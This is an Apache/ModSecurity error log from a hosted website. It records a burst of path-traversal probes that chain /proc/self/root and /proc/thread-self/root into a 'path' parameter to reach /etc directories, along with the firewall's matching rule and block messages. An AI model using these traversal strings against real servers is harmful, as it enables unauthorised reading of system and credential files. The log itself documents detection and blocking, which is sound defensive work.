[Tue Mar 17 15:23:22.932663 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.243.128:45972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcGsU6Sx0TG1YjmQi3TwAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:23.681940 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:35676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcG3Ik7brgkOH-rIWTnwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:26.260173 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.244.43:58076] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmcHqt8Nd0UC_OcbVHSVgAAAIo"]
[Tue Mar 17 15:23:27.419302 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:35692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcHweiSKl8TjouI-YhHQAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:28.125829 2026] [proxy_fcgi:error] [pid 29151:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:32856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:23:28.997901 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:52720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcIKt8Nd0UC_OcbVHSWAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:31.095361 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:52730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcI_PqhzTj3BvfDX-PuQAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:35.590595 2026] [:error] [pid 7004:tid 140411649607424] [client 74.7.241.31:52734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcJ8U6Sx0TG1YjmQi3VAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:37.719733 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:58364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcKfPqhzTj3BvfDX-PwAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:41.136586 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.241.31:58374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcLb-sgTmmJoPuMdy-jQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:43.033977 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:58378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcL3Ik7brgkOH-rIWTpAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:45.315919 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:58384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcMRj0p0SRWAqcjGGBjwAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:45.456075 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.228.61:43616] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmcMa4xEDsg_V3ESNZURAAAAhU"]
[Tue Mar 17 15:23:49.629354 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:35790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcNXIk7brgkOH-rIWTqwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:23:51.126043 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:23:52.419419 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.241.31:35804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcOKt8Nd0UC_OcbVHSYgAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:24:03.378970 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:35814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcQxj0p0SRWAqcjGGBlwAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:24:06.691697 2026] [mime_magic:error] [pid 19507:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:27611] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 15:24:13.033848 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:24:18.170658 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:60080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcUvPqhzTj3BvfDX-PzQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:24:28.402624 2026] [:error] [pid 9299:tid 140411674785536] [client 74.7.241.31:58960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcXL-sgTmmJoPuMdy-nwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:24:40.073922 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33938] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:25:02.294353 2026] [proxy_fcgi:error] [pid 7437:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:25:16.085301 2026] [mime_magic:error] [pid 2473:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:42966] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/spool/postfix
[Tue Mar 17 15:25:24.132435 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:25:34.191391 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.243.128:34560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcnhj0p0SRWAqcjGGBwgAAAws"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:25:38.015567 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.128:35642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcoqBJNF7axNlVR0Ug7gAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:25:52.106442 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35046] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:25:54.714784 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:35354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmcssU6Sx0TG1YjmQi3oAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:25:57.120257 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:38760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmctb-sgTmmJoPuMdy-ygAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:26:14.137802 2026] [proxy_fcgi:error] [pid 18380:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:26:36.125783 2026] [proxy_fcgi:error] [pid 18380:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35634] AH01075: Error dispatching request to : (polling)
